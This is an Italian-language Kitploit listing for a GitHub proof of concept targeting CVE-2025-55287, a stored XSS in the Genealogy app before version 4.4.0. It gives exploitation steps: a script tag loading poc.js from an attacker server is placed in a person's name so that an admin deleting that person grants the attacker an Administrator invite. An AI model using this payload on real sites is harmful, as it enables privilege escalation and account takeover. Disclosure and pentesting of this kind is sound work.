Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55287-POC — Autenticato XSS memorizzato priv esc PoC. Colpisce le versioni di Genealogy precedenti alla 4.4.0. | Kitploit
Strumenti/GitHubGitHub/eternalvalhalla/cve-2025-55287-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubeternalvalhalla/cve-2025-55287-poc

CVE-2025-55287-POC

Autenticato XSS memorizzato priv esc PoC. Colpisce le versioni di Genealogy precedenti alla 4.4.0.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
111 anno faNon ancora revisionato

CVE-2025-55287-POC

Cross-Site Scripting (XSS) Memorizzato Autenticato nell'app Genealogy precedente alla versione 4.4.0 consente l'esecuzione arbitraria di JavaScript e l'escalation dei privilegi dal ruolo Editor+ ad Amministratore.

Riepilogo
  • Tipo di vulnerabilità: Cross-Site Scripting Memorizzato (CWE-79)
  • Componente interessato: 'Person' (nome e cognome)
  • Versioni interessate: tutte le versioni precedenti alla 4.4.0
  • Impatto: esecuzione persistente di JavaScript fornito dall'attaccante nei browser delle vittime; hijack di sessione, CSRF tramite DOM, manipolazione dell'interfaccia, furto di credenziali o azioni arbitrarie impersonando la vittima.
  • Vettore d'attacco: autenticato (qualsiasi ruolo con creazione di nuove persone - editore+)
Sfruttamento

Causa principale: sanificazione/codifica lato server inadeguata del nome/cognome della persona in seguito alla cancellazione con successo della persona interessata da parte di un utente con privilegi più elevati.

PoC:

  1. Effettuare l'autenticazione all'applicazione (ruolo editore+).
  2. Creare una nuova persona (non deve necessariamente essere assegnata a nessuna famiglia).
  3. Includere il JavaScript come nome o cognome della persona aggiunta:
    <script src='yourserver/poc.js'></script>
  4. Modificare il file poc.js con il proprio indirizzo email nel segnaposto.
  5. Una volta che un utente privilegiato tenta di eliminare la persona appena creata, riceverete un invito alla piattaforma all'indirizzo email fornito con il ruolo di Amministratore.
Scarica lo strumento